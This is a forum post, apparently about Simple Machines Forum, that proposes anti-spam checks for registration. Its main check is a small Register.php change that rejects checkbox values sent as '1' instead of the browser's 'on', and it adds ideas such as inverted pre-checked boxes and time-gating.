I seems that human-based mass breaking of forums is not done from
an browser context. So far, some differences how posts are done exists.
Maybe it is worth to work on this (because its very simple).

The answering farms set all checks to "on", but other than browsers they choose "1" instead
of "on" (like browsers do).
Since I changed in Register.php as follows

-       if (!empty($modSettings['coppaAge']) && empty($modSettings['coppaType']) && !isset($_POST['skip_coppa']))
+       if (!empty($modSettings['coppaAge']) && empty($modSettings['coppaType']) && (!isset($_POST['skip_coppa']) || $_POST['skip_coppa'] !== 'on'))


no bot or "farmer" had ever passed the registration ... :)
The same can be done for the "hide e-mail" check (if the over 18 check is
not used at all).

A variation of the above:
Maybe one let a check preselected in checked state and demanding to "uncheck"
it, to finish the registration.

Sure, if this countermeasures would widely adopted, the bot farms may adjust
their "software" to this.

But in general, the right way should be a mixture of several techniques which
altogether build some kind of a fuzzy rule set, to separate real and interested people
from spammers and "farmers".
Time-gating mentioned above is a fundemental thing for doing this.